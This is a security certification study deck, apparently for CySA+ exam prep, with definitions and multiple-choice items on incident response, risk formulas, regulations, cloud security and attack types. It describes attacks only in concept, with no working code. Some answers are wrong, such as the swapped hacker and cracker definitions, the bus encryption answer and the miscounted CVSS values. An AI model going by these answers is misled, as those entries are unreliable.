Which of the following is the first step of the patch management process? 1. Determine the priority of the patches 2. Install the patches 3. Test the patches 4. Ensure that the patches work properly
A. The patch management life cycle includes the following steps: Step 1. Determine the priority of the patches and schedule the patches for deployment. Step 2. Test the patches prior to deployment to ensure that they work properly and do not cause system or security issues. Step 3. Install the patches in the live environment. Step 4. After patches are deployed, ensure that they work properly.
Which of the following characteristics of an incident is a function of how widespread the incident is? 1. Scope 2. Downtime 3. Data integrity 4. Indicator of compromise
A. The scope determines the impact and is a function of how widespread the incident is and the potential economic and intangible impacts it could have on the business.
Which of the following is the first step in the scientific method? 1. Ask a question. 2. Conduct an experiment. 3. Make a conclusion. 4. Establish a hypothesis.
A. The steps are as follows: -Ask a question. -Establish a hypothesis. -Conduct an experiment. -Analyze the results. -Make a conclusion.
Which of the following is an application protocol for exchanging cyber threat information over HTTPS: 1. TAXII 2. STIX 3. OpenIOC 4. OSINT
A. Trusted Automated eXchange of Indicator Information (TAXII) is an application protocol for exchanging cyber threat information (CTI) over HTTPS. It defines two primary services, Collections and Channels.
Which of the following might identify a device that has been compromised with malware? 1. Executable process analysis 2. Regression analysis 3. Risk management 4. Polyinstantiation
A. When the processor is very busy with very little or nothing running to generate the activity, it could be a sign that the processor is working on behalf of malicious software. Executable process analysis allows you to determine this. This is one of the key reasons any compromise is typically accompanied by a drop in performance.
When you allow a file type at the exclusion of all other file types, you have created what? 1. Whitelist 2. Access list 3. Blacklist 4. Graylist
A. Whitelisting is the process of identifying what values are acceptable (IP addresses, e-mail addresses, MAC addresses, web URLs, file types) while excluding all others.
Which of the following enables you to automate the response to a security issue? (Choose the best answer.) 1. Orchestration 2. Piping 3. Scripting 4. Virtualization
A. Workflow orchestration can be used in the security world. Examples include Dynamic incident response plans that adapt in real time Automated workflows to empower analysts and enable faster response
How do you isolate a device at Layer 2 without removing it from the network? 1. Port security 2. Isolation 3. Secured memory 4. Processor encryption
A. You can use port security to isolate a device at Layer 2 without removing it from the network.
ALE = ________________
ALE = SLE × ARO. The annual loss expectancy (ALE) is the expected risk factor of an annual threat event. To determine the ALE, you must know the single loss expectancy (SLE) and the annualized rate of occurrence (ARO). The ARO is the estimate of how often a given threat might occur annually.
Data Protection API (APAPI)
API that lets you encrypt data using the user's loin credentials
RoTs need to be exposed by the operating system to applications through an open ___________.
API. This provides application developers a set of security services and capabilities they can use to secure their applications and protect the data they process.
The ____________ CVSS base metric describes how the attacker would exploit the vulnerability.
AV. Attack Vector (AV) describes how the attacker would exploit the vulnerability and has four possible values:
List at least one form of static code review
Acceptable answers are as follows: Data flow analysis: This analysis looks at runtime information while the software is in a static state. Control flow graph: A graph of the components and their relationships can be developed and used for testing by focusing on the entry and exit points of each component or module. Taint analysis: This analysis attempts to identify variables that are tainted with user-controllable input. Lexical analysis: This analysis converts source code into tokens of information to abstract the code and make it easier to manipulate for testing purposes. Static code review can be done with scanning tools that look for common issues. These tools can use a variety of approaches to find bugs.
List at least one risk to scanning
Acceptable answers include the following: -A false sense of security can be introduced because scans are not error free. -Many tools rely on a database of known vulnerabilities and are only as valid as the latest update. -Identifying vulnerabilities does not in and of itself reduce your risk or improve your security.
List at least one question that should be raised to determine asset criticality
Acceptable answers include the following: -Will you be able to recover the data in case of disaster? -How long will it take to recover the data? -What is the effect of this downtime, including loss of public standing?
List at least two logical hardening techniques
Acceptable answers include the following: Remove unnecessary applications. Disable unnecessary services. Block unrequired ports. Tightly control the connecting of external storage devices and media (if it's allowed at all).
List the family and class of at least two of the NIST SP 800-53 control families.
Access Control (AC) Technical Awareness and Training (AT) Operational Audit and Accountability (AU) Technical Security Assessment and Authorization (CA) Management Configuration Management (CM) Operational Contingency Planning (CP) Operational Identification and Authentication (IA) Technical Incident Response (IR) Operational Maintenance (MA) Operational Media Protection (MP) Operational Physical and Environmental Protection (PE) Operational Planning (PL) Management Program Management (PM) Management Personnel Security (PS) Operational Risk Assessment (RA) Management System and Services Acquisition (SA) Management System and Communications Protection (SC) Technical System and Information Integrity (SI) Operational
Permissions
Access rights granted or denied at the file, folder, or other object level
Define Communications Assistance for Law Enforcement Act (CALEA) of 1994
Act that requires telecommunications carriers and manufacturers of telecommunications equipment to modify and design their equipment, facilities, and services to ensure that they have build-in surveillance capabilities
Define Gramm-Leach-Bliley Act (GBLA) of 1999
Affects all financial institutions, including banks, loan companies, insurance companies, investment companies, and credit card providers.
Define Economic Espionage Act of 1996
Affects companies that have trade secrets and any individuals who plan to use encryption technology for criminal activities
Define Health Care and Education Reconciliation Act of 2010
Affects healthcare and educational organizations. This act increased some of the security measures that must be taken to protect healthcare information.
Personal Information Protection and Electronic Documents Act (PIPEDA)
Affects how private-sector organizations collect, use, and disclose personal information in the course of commercial business in Canada.
USA PATRIOT Act
Affects law enforcement and intelligence agencies in the United States. Its purpose is to enhance the investigatory tools that law enforcement can use, including e-mail communications, telephone records, Internet communications, medical records, and financial records.
Define Electronic Communications Privacy Act (ECPA) of 1986
Affects law enforcement and intelligence agencies; extended government restrictions on wiretaps from telephone calls to include transmissions of electronic data by computer and prohibited access to stored electronic communications
Define Domain Generation Algorithm (DGA)
Algorithm that is used by attackers to periodically generate large numbers of that can be used as rendezvous points with their command and control servers
Define Asymmetric Algorithms
Algorithms that use both a public key and a private or secret key. The public key is known by all parties and the private key is known only by its owner.
DomainKeys Identified Mail (DKIM)
Allows e-mail source verification by providing a method for validating a domain name identity that is associated with a message through cryptographic authentication
Define eFuse
Allows for the dynamic real-time reprogramming of computer chips
Port Security
Allows you to keep a port enabled for legitimate devices while preventing its use by illegitimate devices.
Sarbanes-Oxley Act (SOX)
Also known as the Public Company Accounting Reform and Investor Protection Act of 2002, affects any organization that is publicly traded in the United States. It controls the accounting methods and financial reporting for the organizations and stipulates penalties and even jail time for executive officers.
Define data masking
Altering data from its original state to protect it
Define internet Security Association and Key Management Protocol (ISAKMP)
An IPsec component that handles the creation of a security association for the session and the exchange of keys
Define Internet Key Exchange (IKE)
An IPsec component that provides the authentication material used to create the keys exchanged by ISAKMP during peer authentication
Define Online Certificate Status Protocol (OCSP)
An Internet protocol that obtains the revocation status of an X.509 digital certificate
vulnerability feed
An RSS feed dedicated to the sharing of information about the latest vulnerabilities.
Service Provisioning Markup Language (SPML)
An XML-based framework developed by the Organization for the Advancement of Structured Information Standards (OASIS).
STIX
An XML-based programming language that can be used to communicate cybersecurity data among those using the language.
Structured Threat Information eXpression (STIX)
An XML-based programming language that can be used to communicate cybersecurity data among those using the language.
Persistent XSS
An XSS attack in which the hacker stores the user input on the target server, such as in a database, in a message forum, a comment field, and so forth, and then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser. Also called a stored or Type I attack
Define Hardware Security Module (HSM)
An appliance that safeguards and manages digital keys used with strong authentication and provides crypto processing
Trusted Automated eXchange of Indicator Information (TAXII)
An application protocol for exchanging cyber threat information (CTI) over HTTPS.
Secure Shell (SSH)
An application protocol that is used to remotely log in to another computer using a secure tunnel.
OWASP Zed Attack Proxy (ZAP)
An application that stands between the web server and the client and passes all requests and responses back and forth, while analyzing the information to test the security of the web application
Define Building Automation and Control Networks (BACnet) protocol
An application, network, and media access control (MAC) layer communications service. It can operate over a number of Layer 2 protocols, including Ethernet
service-oriented architecture (SOA)
An architecture that operates on the theory of providing web-based communication functionality without each application requiring redundant code to be written per application.
Switch Spoofing
An attack against switch ports using the Dynamic Trunking Protocol in which the attacker spoofs their machine to appear as a switch. DTP creates a trunk link and the attacker can then capture traffic from all VLANs.
Define Denial-of-Service (DoS) attack
An attack in which attackers flood a device with enough requests to degrade the performance of the targeted device.
ARP Spoofing
An attack in which the ARP cache on a switch is poisoned; allowing the attacker to have the victim's traffic be routed to their machine instead.
Race Condition
An attack in which the hacker inserts himself between instructions, introduces changes, and alters the order of execution of the instructions, thereby altering the outcome
session hijacking
An attack that attempts to place the hacker in the middle of an active conversation between two computers for the purpose of taking over the session of one of the two systems, thus receiving all data sent to that system.
time-of-check/time-of-use
An attack that attempts to take advantage of the sequence of events that occurs as the system completes common tasks.
Define Click Jacking
An attack that crafts a transparent page or frame over a legitimate-looking page that entices the user to click something
Define cross-site request forgery (CSRF)
An attack that exploits the website's trust of the browser. The website thinks that the request came from the user's browser and was actually made by the user.
Structured Query Language (SQL) injection
An attack that inserts, or "injects," a SQL query as the input data from the client to the application.
Define Main-in-the-middle attack
An attack that intercepts legitimate traffic between two entities
VM escape
An attack that occurs when a guest OS escapes from its VM encapsulation to interact directly with the hypervisor.
Define cross-site scripting (XSS)
An attack that occurs when an attacker locates a website vulnerability and injects malicious code into the web application
Define Buffer Overflow
An attack that occurs when the amount of data that is submitted is larger than the buffer can handle
Define Extensible Markup Language (XML) attack
An attack that targets the use of XML in a website. In one example, it compromises the application that parses or reads and interprets the XML. If the XML input contains a reference to an external entity and is processed by a weakly configured XML parser, it can lead to the disclosure of confidential data, denial of service, server-side request forgery, and port scanning. This is called an XML external entity attack.
SYN flood
An attack where the target is overwhelmed with unanswered SYN/ACK packets.
threat actor
An attacker who takes advantage of a security loophole.
Define Multifactor Authentication (MFA)
An authentication process that requires more than a single authentication factor
Role-based access control (RBAC)
An authentication system in which users are organized by job role into security groups, which are then granted the rights and permissions required to perform the job.
Domain-based Message Authentication, Reporting, and Conformance (DMARC)
An e-mail authentication and reporting protocol that improves e-mail security within federal agencies
Sender Policy Framework (SPF)
An e-mail validation system that works by using DNS to determine whether an e-mail sent by someone has been sent by a host sanctioned by that domain's administrator.
Rogue Endpoint
An endpoint device that is not under your control as administrator
The Open Group Architecture Framework (TOGAF)
An enterprise architecture framework that helps organizations design, plan, implement, and govern an enterprise information architecture.
SABSA
An enterprise security architecture framework that uses the six communications questions (What, Where, When, Why, Who, and How) that intersect with six layers (Operational, Component, Physical, Logical, Conceptual, and Contextual)
Policy enforcement point (PEP)
An entity that protects the resource that the subject (a user or an application) is attempting to access in XACML
Policy Decision Point (PDP)
An entity that retrieves all applicable policies in XACML and compares the request with the policies
single sign-on (SSO)
An environment in which a user enters his login credentials once and can access all resources in the network.
Define Pacu
An exploit framework used to assess and attack Amazon Web Services (AWS) cloud environments
Define Function as a Service (FaaS)
An extension of Platform as a Service (PaaS) that goes further and completely abstracts the virtual server from the developers. Charges are based not on server instance sizes but on consumption and executions
Define Hacker
An individual who attempts to break into secure systems to obtain knowledge about the systems and possibly use that knowledge to carry out pranks or crimes
Define cracker
An individual who attempts to break into secure systems without using the knowledge gained for any nefarious purposes
telemetry system
An industrial control system (ICS) component that connects RTUs and PLCs to control centers and the enterprise.
tabletop exercise
An informal brainstorming session that encourages participation from business leaders and other key employees.
virtual desktop infrastructure (VDI)
An infrastructure that hosts desktop operating systems within a virtual environment in a centralized server.
System-on-Chip (SoC)
An integrated circuit (also known as a "chip") that integrates all components of a computer or other electronic system.
ZAP
An interception proxy produced by the Open Web Application Security Project (OWASP).
OpenIOC
An open framework that is designed for sharing threat intelligence information in a machine-readable format.
Define OpenIOC
An open framework, meant for sharing threat intelligence information in a machine-readable format
Shibboleth
An open source project that provides single sign-on (SSO) capabilities and allows sites to make informed authorization decisions for individual access of protected online resources in a privacy-preserving manner.
Define OpenVAS
An open source scanner developed from the Nessus code base, available as a package for many Linux distributions
Define OpenID
An open standard and decentralized protocol by the nonprofit OpenID Foundation that allows users to be authenticated by certain cooperating sites.
Unified Extensible Firmware Interface (UEFI)
An open standard interface layer between the firmware and the operating system that requires firmware updates to be digitally signed.
Define impact analysis
Analysis that determines impact of the event
Define Heuristics
Analysis that determines the susceptibility of a system to a particular threat/risk using decision rules or weighing methods
Define Packet Analysis
Analysis that examines an entire packet, including the payload.
Protocol Analysis
Analysis that examines information in the header of a packet
trend analysis
Analysis that focuses on the long-term direction in the increase or decrease in a particular type of traffic or in a particular behavior in the network.
Define memory dumping
Analyzing the entire memory content used by an application
Arrange the following steps of the SDLC in the proper order: a. Gather requirements b. Certify/accredit c. Release/maintain d. Design e. Test/validate f. Perform change management and configuration management/replacement g. Plan/initiate project
Answer: Step 1. Plan/initiate project Step 2. Gather requirements Step 3. Design Step 4. Develop Step 5. Test/validate Step 6. Release/maintain Step 7. Certify/accredit Step 8. Perform change management and configuration management/replacement The software development life cycle (SDLC) is a set of ordered steps to help ensure that software is developed to enhance both security and functionality.
List the steps, in order, of the incident response process.
Answer: The steps are as follows: -Preparation -Detection -Analysis -Containment -Eradication and recovery -Post-incident activities
List at least two parts of a Syslog message.
Answers can include Facility: The source of the message. The source can be the operating system, the process, or an application. Severity: Rated using a numeric scale. Source: The log from which this entry came. Action: The action taken on the packet. Source: The source IP address and port number. Destination: The destination IP address and port number.
List at least one of the network architecture planes.
Answers can include any of the three planes: -The control plane carries signaling traffic originating from or destined for a router. This is the information that allows routers to share information and build routing tables. -The data plane, also known as the forwarding plane, carries user traffic. -The management plane administers the router.
List at least two guidelines to consider as part of a good security audit plan.
Answers can include the following: -At minimum, perform annual audits to establish a security baseline. -Determine your organization's objectives for the audit and share them with the auditors. -Set the ground rules for the audit before the audit starts, including the dates/times of the audit. -Choose auditors who have security experience. -Involve business unit managers early in the process. -Ensure that auditors rely on experience, not just checklists. -Ensure that the auditor's report reflects risks that your organization has identified. -Ensure that the audit is conducted properly. -Ensure that the audit covers all systems and all policies and procedures. -Examine the report when the audit is complete.
List at least one of the security issues with serverless computing in the cloud.
Answers can include the following: -Function event data injection: Triggered through untrusted input such as through a web API call -Broken authentication: Coding issues ripe for exploit and attacks, which lead to unauthorized authentication -Insecure serverless deployment configuration: Human error in setup -Over-privileged function permissions and roles: Failure to implement the least privilege concept
List and define at least two types of viruses.
Answers can include the following: Boot sector: This type of virus infects the boot sector of a computer and either overwrites files or installs code into the sector so that the virus initiates at startup. Parasitic: This type of virus attaches itself to a file, usually an executable file, and then delivers the payload when the program is used. Stealth: This type of virus hides the modifications that it is making to the system to help avoid detection. Polymorphic: This type of virus makes copies of itself, and then makes changes to those copies. It does this in hopes of avoiding detection from antivirus software. Macro: This type of virus infects programs written in Word, Basic, Visual Basic, or VBScript that are used to automate functions. Macro viruses infect Microsoft Office files and are easy to create because the underlying language is simple and intuitive to apply. They are especially dangerous in that they infect the operating system itself. They also can be transported between different operating systems because the languages are platform independent. Multipartite: Originally, these viruses could infect both program files and boot sectors. This term now means that the virus can infect more than one type of object or can infect in more than one way. File or system infector: File infectors infect program files, and system infectors infect system program files. Companion: This type of virus does not physically touch the target file. It is also referred to as a spawn virus. E-mail: This type of virus specifically uses an e-mail system to spread itself because it is aware of the e-mail system functions. Knowledge of the functions allows this type of virus to take advantage of all e-mail system capabilities. Script: This type of virus is a stand-alone file that can be executed by an interpreter.
Define Indicator of Compromise (IOC)
Any activity, artifact, or log entry that is typically associated with an attack of some sort
Proxy
Any device or application that acts as an intermediary for requests from clients seeking resources
The ____________________ focuses on the operation of Windows applications.
Application log. Events in this log are classified as error, warning, or information, depending on the severity of the event.
___________________ tend to be the most exposed parts of a cloud system because they're usually accessible from the open Internet.
Application programming interfaces (APIs). With respect to APIs, a host of approaches—including Simple Object Access Protocol (SOAP), Representational State Transfer (REST), and JavaScript Object Notation (JSON)—are available, and many enterprises find themselves using all of them.
Patching
Applying updates that fix security or functional issues
______________________ are groups of VMware virtual machines that are managed and orchestrated as a unit to provide a service to users.
Apps. In the VMware world, technicians can create what are called apps. Apps are groups of virtual machines (VMs) that are managed and orchestrated as a unit to provide a service to users.
Screened Subnet
Architecture where two firewalls are used, and traffic must be inspected at both firewalls before it can enter the internal network
________________________ describes the relative value of an asset to the organization
Asset criticality. Data and assets should be classified based on their value to the organization and their sensitivity to disclosure. Assigning a value to data and assets allows an organization to determine the resources that should be used to protect them
_____________________ is the process of placing physical identification numbers of some sort on all assets.
Asset tagging. Asset tagging can also be a part of a more robust asset tracking system when implemented in such a way that the device can be tracked and located at any point in time.
MAC Overflow
Attack which can cause a switch to fill its MAC address table with nonexistent MAC addresses, which prevents valid devices from creating content-addressable memory entries and allows the attacker to receive traffic which isn't addressed to them.
Rooting or Jailbreaking
Attaining root privileges on a smartphone
Define Knowledge Factor Authentication
Authentication based on something committed to memory
Define Characteristic Factor Authentication
Authentication based on something the person is
Define Ownership Factor Authentication
Authentication based on something you own
Secure Boot
Authentication method that requires all boot loader components (e.g., OS kernal, driver) attest to their identity (digital signature) and the attestation is compared to the trusted list.
Define Mandatory Access control (MAC)
Authentication system in which authorization is based on security labels
Define Attribute-based access control (ABAC)
Authentication system that grants or denies user requests based on arbitrary attributes of the user and arbitrary attributes of the object, and environment conditions that may be globally recognized.
Which of the following is a software layer that operates as a gatekeeper between an organization's on-premises network and the provider's cloud environment? 1. Virtual Router 2. CASB 3. HoneyPot 4. Black Hole
B. A cloud security broker, or cloud access security broker (CASB), is a software layer that operates as a gatekeeper between an organization's on-premises network and the provider's cloud environment. It can provide many services in this strategic position.
An FPGA is an example of which of the following: 1. SoC 2. PLD 3. PGA 4. Hypervisor
B. A field programmable gate array (FPGA) is a type of programmable logic device (PLD) that is programmed by blowing fuse connections on the chip or using an antifuse that makes a connection when a high voltage is applied to the junction. (A PLD is an integrated circuit with connections or internal logic gates that can be changed through a programming process.)
Which of the following is a document that, while not legally binding, indicates a general agreement between the principals to do something together? 1. SLA 2. MOU 3. ICA 4. SCA
B. A memorandum of understanding (MOU) is a document that, while not legally binding, indicates a general agreement between the principals to do something together. An organization may have MOUs with multiple organizations, and MOUs may in some instances contain security requirements that inhibit or prevent the deployment of certain measures.
Which of the following is a risk assessment that determines risks associated with PII collection? 1. MTA 2. PIA 3. RSA 4. SLA
B. A privacy impact assessment (PIA) is a risk assessment that determines risks associated with PII collection, use, storage, and transmission. A PIA should determine whether appropriate PII controls and safeguards are implemented to prevent PII disclosure or compromise.
Which of the following is a set of command-line tools you can use to sniff WLAN traffic? 1. hping3 2. Aircrack-ng 3. Qualys 4. Reaver
B. Aircrack-ng focuses on these areas of Wi-Fi security: Monitoring: Packet capture and export of data to text files for further processing by third-party tools Attacking: Replay attacks, deauthentication, fake access points, and others via packet injection Testing: Checking Wi-Fi cards and driver capabilities (capture and injection) Cracking: WEP and WPA PSK (WPA1 and 2)
Which of the following allows for the dynamic real-time reprogramming of computer chips? 1. TAXII 2. eFuse 3. UEFI 4. TPM
B. An eFuse allows for the dynamic real-time reprogramming of computer chips. Utilizing a set of eFuses, a chip manufacturer can allow for the circuits on a chip to change while it is in operation.
Which of the following industrial control system components connect to the sensors and convert sensor data to digital data, including telemetry hardware: 1. PLCs 2. RTUs 3. BUS link 4. Modbus
B. An industrial control system includes the following components: Sensors: Sensors typically have digital or analog I/O and are not in a form that can be easily communicated over long distances. Remote terminal units (RTUs): RTUs connect to the sensors and convert sensor data to digital data, including telemetry hardware. Programmable logic controllers (PLCs): PLCs connect to the sensors and convert sensor data to digital data; they do not include telemetry hardware. Telemetry system: Such a system connects RTUs and PLCs to control centers and the enterprise. Human interface: Such an interface presents data to the operato
Which of the following technologies can zero out sensitive data if it detects penetration of its security and may even do this with no power? 1. TPM 2. Anti-tamper 3. Secure enclave 4. Measured boot
B. Anti-tamper technology is designed to prevent access to sensitive information and encryption keys on a device. Anti-tamper processors, for example, store and process private or sensitive information, such as private keys or electronic money credit. The chips are designed so that the information is not accessible through external means and can be accessed only by the embedded software, which should contain the appropriate security measures, such as required authentication credentials.
Which of the following IoCs is most likely an indication of a botnet? 1. Beaconing 2. Irregular peer-to-peer communication 3. Bandwidth consumption 4. Rogue device on the network
B. At the very least, illegal file sharing could be occurring, and at the worst, this peer-to-peer (P2P) communication could be the result of a botnet. Peer-to-peer botnets differ from normal botnets in their structure and operation.
Which metric included in the CVSS Attack Vector metric group means that the attacker can cause the vulnerability from any network? 1. B 2. N 3. L 4. A
B. Attack Vector (AV) describes how the attacker would exploit the vulnerability and has three possible values: L: Stands for Local and means that the attacker must have physical or logical access to the affected system. A: Stands for Adjacent network and means that the attacker must be on the local network. N: Stands for Network and means that the attacker can cause the vulnerability from any network. P: Stands for Physical and requires the attacker to physically touch or manipulate the vulnerable component.
Which of the following is an example of machine learning? 1. NAC 2. AEG 3. EDR 4. DLP
B. Automatic exploit generation (AEG) is the "first end-to-end system for fully automatic exploit generation," according to the Carnegie Mellon Institute's own description of its AI named Mayhem. Developed for off-the-shelf as well as the enterprise software being increasingly used in smart devices and appliances, AEG can find a bug and determine whether it is exploitable.
Which of the following is a tool used to automate network functions? 1. DMVPN 2. Puppet 3. Net DNA 4. Modbus
B. Automation tools such as Puppet, Chef, and Ansible and scripting are automating once manual networking tasks such as log analyses, patch application, and intrusion prevention.
Which of the following are threats discovered in live environments that have no current fix or patch: 1. Known threats 2. Zero-day threats 3. Unknown threats 4. Advanced persistent threats
B. Because zero-day attacks occur before a fix or patch has been released, it is difficult to prevent them. As with many other attacks, keeping all software and firmware up to date with the latest updates and patches is important.
What is used by newer Microsoft operating systems to protect certificates, BIOS, passwords, and program authenticity? 1. Security extensions 2. Bus encryption 3. UEFI 4. Secure enclaves
B. Bus encryption is necessary not only to prevent tampering of encrypted instructions that may be easily discovered on a data bus or during data transmission, but also to prevent discovery of decrypted instructions that may reveal security weaknesses that an intruder can exploit.
Which of the following occurs when the adequacy of a system's overall security is accepted by management? 1. Certification 2. Accreditation 3. Acceptance 4. Due diligence
B. Certification evaluates the technical system components, whereas accreditation occurs when the adequacy of a system's overall security is accepted by management.
Which of the following includes removing data from the media so that it cannot be reconstructed using normal file recovery techniques and tools? 1. Destruction 2. Clearing 3. Purging 4. Buffering
B. Clearing includes removing data from the media so that it cannot be reconstructed using normal file recovery techniques and tools. With this method, the data is recoverable only using special forensic techniques.
In which stage of the intelligence cycle does most of the hard work occur: 1. Requirements 2. Collection 3. Dissemination 4. Analysis
B. Collection is the stage in which most of the hard work occurs. It is also the stage at which recent advances in artificial intelligence (AI) and automation have changed the game. It's time-consuming work that involves web searches, interviews, identifying sources, and monitoring, to name a few activities.
Malware that is widely available for either purchase or by free download is called what? 1. Advanced 2. Commodity 3. Bulk 4. Proprietary
B. Commodity malware is malware that is widely available either for purchase or by free download. It is not customized or tailored to a specific attack. It does not require complete understanding of its processes and is used by a wide range of threat actors with a range of skill levels.
Which scripting language is used to work in the Linux interface? 1. Python 2. Bash 3. Ruby 4. Perl
B. Common scripting languages include the following: bash: Used to work in the Linux interface Node js: Framework to write network applications using JavaScript Ruby: Great for web development Python: Supports procedure-oriented programming and object-oriented programming Perl: Found on all Linux servers, helps in text manipulation tasks
Which control provides data integrity? 1. Encryption 2. Hashing 3. Redundancy 4. Digital signatures
B. Cryptography in the form of hashing algorithms provides a way to assess data integrity.
Preventing data exfiltration is the role of which of the following? 1. Trend analysis 2. DLP 3. NAC 4. Port security
B. Data loss prevention software uses ingress and egress filters to identify sensitive data that is leaving the organization and can prevent such leakage.
Which of the following means altering data from its original state to protect it? 1. Deidentification 2. Data masking 3. DLP 4. Digital signatures
B. Data masking means altering data from its original state to protect it. Two forms of masking are encryption (storing the data in an encrypted form) and hashing (storing a hash value, generated from the data by a hashing algorithm, rather than the data itself).
Which statement is false regarding the change management process? 1. All changes should be formally requested 2. Each request should be approved as quickly as possible 3. Prior to formal approval, all costs and effects of the methods of implementation should be reviewed 4. After they're approved, the change steps should be developed
B. Each request should not be approved as quickly as possible. Each request should be analyzed to ensure it supports all goals and polices.
Which of the following involves marking a video, photo , or other digital media with a GPS location? 1. TAXII 2. Geotagging 3. Geofencing 4. RFID
B. Geotagging involves marking a video, photo, or other digital media with a GPS location. This feature has received criticism recently because attackers can use it to pinpoint personal information, such as the location of a person's home.
Which of the following cryptographic techniques provides the best method of ensuring integrity and determines if data has been altered? 1. Encryption 2. Hashing 3. Digital Signature 4. Certificate Pinning
B. Hash functions do not prevent data alteration but provide the best method to determine whether data alteration has occurred.
Which of the following is the most exposed part of a cloud deployment: 1. Cryptographic functions 2. APIs 3. VMs 4. Containers
B. Interfaces and application programming interfaces (APIs) tend to be the most exposed parts of a system because they're usually accessible from the open Internet.
Which of the following is not true of the cloud-based approach to vulnerability scanning? 1. Installation costs are lower than with a premises-based solution. 2. Maintenance costs are higher than with a premises-based solution. 3. Upgrades are included in a subscription. 4. It does not require the client to provide onsite equipment
B. Maintenance costs are lower because there is only one centralized component to maintain, and it is maintained by the vendor (not the end client).
Which statement is false with respect to multitenancy in a cloud? 1. It can lead to allowing another tenant or attack to see others' data or to assume the identity of other clients. 2. It prevents residual data of former tenant from being exposed in storage space assigned to new tenant 3. Users may lose access due to inadequate redundancy and fault tolerance measures 4. Shared ownership of data with the customer can limit the legal liability of the provider
B. Multitenancy in a cloud does not necessarily prevent residual data of former tenants from being exposed in storage space assigned to new tenants. In fact, that is one of the dangers of multitenancy.
Which of the following could be a filename or could be some series of characters that can be tied uniquely to the malware? 1. Key 2. Signature 3. Fingerprint 4. Scope
B. Network security devices such as SIEM, IPS, IDS, and firewall systems must be able to recognize the malware when it is still contained in network packets before it reaches devices. This requires identifying a malware signature.
Which of the following is referred to as Layer 2 security? 1. Sandbox 2. Port security 3. Encoding 4. Subnetting
B. Port security applies to ports on a switch, and because it relies on monitoring the MAC addresses of the devices attached to the switch ports, it is considered to be Layer 2 security.
Which of the following relates to rights to control the sharing and use of one's personal information? 1. Security 2. Privacy 3. Integrity 4. Confidentiality
B. Privacy relates to rights to control the sharing and use of one's personal information. This type of information is called personally identifiable information (PII).
Which of the following is an example of a cloud-based vulnerability scanner? 1. OpenVAS 2. Qualys 3. Nikto 4. NESSUS
B. Qualys is an example of a cloud-based vulnerability scanner. Sensors are placed throughout the network, and they upload data to the cloud for analysis.
Which of the following is done to verify functionality after making a change to the software? 1. User acceptance testing 2. Regression testing 3. Fuzz testing 4. Code review
B. Regression testing is done to verify functionality after making a change to the software. Security regression testing is a subset of regression testing that validates that changes have not reduced the security of the application or opened new weaknesses.
Which of the following is not a goal of risk assessment? 1. Identify vulnerabilities and threats. 2. Identify key stakeholders. 3. Identify assets and asset value. 4. Calculate threat probability and business impact.
B. Risk assessment (or analysis) has four main goals: -Identify assets and asset value. -Identify vulnerabilities and threats. -Calculate threat probability and business impact. -Balance threat impact with countermeasure costs.
Which of the following is a data collection tool that allows you to use longitudinal survey panels to track and monitor the cloud environment? 1. Prowler 2. ScoutSuite 3. Pacu 4. Mikto
B. ScoutSuite is a data collection tool that allows you to use longitudinal survey panels to track and monitor the cloud environment. ScoutSuite is open source and utilizes APIs made available by the cloud provider.
Which of the following functions uses shared threat intelligence data to build in security for new products and solutions? 1. Incident Response 2. Security Engineering 3. Vulnerability Management 4. Risk Management
B. Security engineering is the process of architecting security features into the design of a system or set of systems. It has as its goal an emphasis on security from the ground up, sometimes stated as "building in security." Unless the very latest threats are shared with this function, engineers cannot be expected to build in features that prevent threats from being realized.
Which of the following is the monetary impact of each threat occurrence? 1. ALE 2. SLE 3. AV 4. EF
B. Single loss expectancy (SLE) is the monetary impact of each threat occurrence. To determine the SLE, you must know the asset value (AV) and the exposure factor (EF). The EF is the percentage value or functionality of an asset that will be lost when a threat event occurs. The calculation for obtaining the SLE is as follows: SLE = AV × EF
Which of the following is a measure of how freely data can be handled? 1. Transparency 2. Sensitivity 3. Value 4. Quality
B. Some data requires special care and handling, especially when inappropriate handling could result in penalties, identity theft, financial loss, invasion of privacy, or unauthorized access by an individual or many individuals.
Which of the following is a type of proactive monitoring and uses external agents to run scripted transactions against an application: 1. RUM 2. Synthetic transaction monitoring 3. Reverse engineering 4. OWASP
B. Synthetic transaction monitoring, which is a type of proactive monitoring, uses external agents to run scripted transactions against an application. This type of monitoring is often preferred for websites and applications.
Which of the following affects any organizations that handle cardholder information for the major credit card companies? 1. GLBA 2. PCI DSS 3. SOX 4. HIPAA
B. The Payment Card Industry Data Security Standard (PCI DSS) affects any organizations that handle cardholder information for the major credit card companies. The latest version is 3.2.1.
Which of the following is a utility built into the Windows 10 operating system that checks for system file corruption? 1. TripWire 2. System File Checker 3. sigver 4. SIEM
B. The System File Checker (SFC) is a utility built into Windows 10 that checks for and restores corrupt operating system files.
Which of the following is false with respect to the incident response communication plan? 1. Organizations in certain industries may be required to comply with regulatory or legislative requirements with regard to communicating data breaches. 2. Content of these communications should include as much information as possible. 3. All responders should act to prevent the disclosure of any information to parties that are not specified in the communication plan. 4. All communications that takes place between the stakeholders should use a secure communication process.
B. The content of these communications should be limited to what is necessary for each stakeholder to perform his or her role.
To implement ISO/IEC 27001:2013, the project manager should complete which step first? 1. Identify the requirements 2. Obtain management support 3. Perform risk assessment and risk treatment 4. Define the ISMS scope, information security policy, and information security objectives
B. The first step is to obtain management support, which is critical to both the support of the program and its budget.
Which of the following is a software development practice whereby the work of multiple individuals is combined a number of times a day? 1. Sinkholing 2. Continuous integration 3. Aggregation 4. Inference
B. The idea behind continuous integration is to identify bugs as early as possible in the development process.
Which of the following is not an example of utilizing trend analysis? 1. An increase in the use of a SQL server, indicating the need to increase resources on the server 2. The identification of threats based on behavior that typically accompanies such threats 3. A cessation in traffic bound for a server providing legacy services, indicating a need to decommission the server 4. An increase in password resets, indicating a need to revise the password policy
B. The identification of threats based on behavior that typically accompanies such threats is a characteristic of heuristics, not trend analysis.
When you are determining what role the quality of the response played in the severity of the issue, what type of analysis are you performing? 1. Trend analysis 2. Impact analysis 3. Log analysis 4. Reverse engineering
B. The purpose of determining the impact is to Identify what systems were impacted Determine what role the quality of the response played in the severity of the issue For the future, associate the attack type with the systems that were impacted
Which team acts as the attacking force? 1. Green 2. Red 3. Blue 4. White
B. The red team acts as the attacking force. It typically carries out penetration tests by following a well-established process of gathering information about the network, scanning the network for vulnerabilities, and then attempting to take advantage of the vulnerabilities.
Which of the following is responsible for reviewing NDAs to ensure support for incident response efforts? 1. Human resources 2. Legal 3. Management 4. Public relations
